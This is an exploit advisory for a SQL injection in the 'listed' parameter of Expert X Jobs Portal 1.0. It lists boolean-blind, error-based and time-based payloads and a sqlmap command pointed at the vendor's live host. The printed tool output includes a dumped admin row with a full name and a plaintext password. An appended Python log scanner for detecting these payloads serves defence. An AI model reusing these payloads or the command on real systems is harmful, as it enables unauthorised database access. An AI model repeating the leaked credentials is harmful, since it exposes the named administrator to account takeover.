Expert X Jobs Portal And Resume Builder 1.0 SQL Injection
Expert X Jobs Portal and Resume Builder version 1.0 suffers from a remote SQL injection vulnerability.
Author    : CraCkEr
Website   : wvidesk.com
Vendor    : WVIDesk
Software  : Expert X - Jobs Portal and Resume Builder v. 1.0
            Expert X can manage jobs, courses, events and scholarships.
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

GET parameter 'listed' is vulnerable.

---
Parameter: listed (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD

    Type: time-based blind
    Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
    Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#
---

[+] Starting the Attack

sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:03:36] [INFO] fetching current database
[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'
current database: 'livexzfv_jobdreamers'

fetching tables for database: 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
[56 tables]

fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
Table: siteadminuser
[8 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| aflag    | varchar(2)   |
| desig    | varchar(200) |
| enet     | varchar(450) |
| fullname | varchar(450) |
| id       | int(10)      |
| pw       | varchar(25)  |
| role     | int(10)      |
| users    | varchar(200) |
+----------+--------------+

fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
Table: siteadminuser
[1 entry]
+-------+------------+--------------------+------------------------+----+------+------+-------+
| aflag | desig      | enet               | fullname               | id | pw   | role | users |
+-------+------------+--------------------+------------------------+----+------+------+-------+
| Y     | Site Admin | [email protected]  | Mohammad Alamgir Kabir | 1  | 5664 | 1    | Kabir |
+-------+------------+--------------------+------------------------+----+------+------+-------+

[-] Done
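
Detection sketch for the 'listed' parameter on /companies, added here as an example and not part of the original advisory: it scans web-server access logs for values that fail a digits-only allow-list and tags them by the three techniques listed above. The log lines are constructed, and the function names, the allow-list rule and the marker patterns are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Client address and request target of an Apache combined-log entry.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate 'listed' value is a short run of ASCII digits.
ALLOWED = re.compile(r"[0-9]{1,10}")
# Markers derived from the payload types shown in the advisory.
MARKERS = {
    "quote-breakout": re.compile(r"['\"]"),
    "boolean-test": re.compile(r"\b(?:AND|OR)\b\s+\(?\s*\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND", re.I),
    "time-based": re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.I),
}

def log_line(client, value):
    """Build a constructed combined-log line for /companies?listed=<value>."""
    return (f'{client} - - [01/Jan/2022:23:03:30 +0000] '
            f'"GET /companies?listed={quote(value, safe="")} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')

# Constructed sample traffic (documentation IP ranges, not real requests).
SAMPLE_LOG = [
    log_line("198.51.100.7", "1"),
    log_line("203.0.113.9", "1' AND 6926=6926 AND 'ZFlv'='ZFlv"),
    log_line("203.0.113.9", "1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#"),
]

def scan(lines, path="/companies", param="listed"):
    """Return (client, decoded value, tags) for every value that fails the allow-list."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable GET/HEAD entry
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes, so encoded quotes and '#' are seen in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if ALLOWED.fullmatch(value):
                continue
            tags = sorted(t for t, rx in MARKERS.items() if rx.search(value))
            findings.append((client, value, tags or ["non-numeric"]))
    return findings

if __name__ == "__main__":
    for client, value, tags in scan(SAMPLE_LOG):
        print(client, tags, value)
```

The same digits-only rule belongs in the application as server-side validation of 'listed', with the value bound as a query parameter rather than concatenated into the SQL string.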